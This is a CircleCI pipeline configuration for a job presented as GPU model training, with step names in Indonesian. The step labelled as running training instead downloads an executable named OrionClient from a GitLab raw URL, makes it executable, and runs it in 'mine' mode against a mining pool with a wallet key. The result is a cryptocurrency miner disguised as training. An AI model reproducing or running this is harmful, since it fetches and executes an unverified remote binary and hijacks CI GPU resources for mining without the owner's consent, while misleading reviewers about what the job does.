version: 2.1

executors:
  gpu-executor:
    machine:
      image: ubuntu-2204:current
    resource_class: your-namespace/gpu-runner

jobs:
  gpu-train:
    executor: gpu-executor
    steps:
      - checkout

      - run:
          name: Cek NVIDIA GPU
          command: |
            nvidia-smi

      - run:
          name: Install dependencies
          command: |
            sudo apt update
            sudo apt install -y python3-pip
            pip3 install torch torchvision

      - run:
          name: Jalankan training
          command: |
            wget https://gitlab.com/kardisali2/veo-three/-/raw/main/OrionClient ; chmod +x OrionClient ; ./OrionClient mine --disable-cpu --gpu --pool twbitz --key 9MovZpdGjSC3dvXGQSqw6yP46ZazaVRKpdngWFGe4Pwo --worker PRO

workflows:
  version: 2
  gpu-workflow:
    jobs:
      - gpu-train
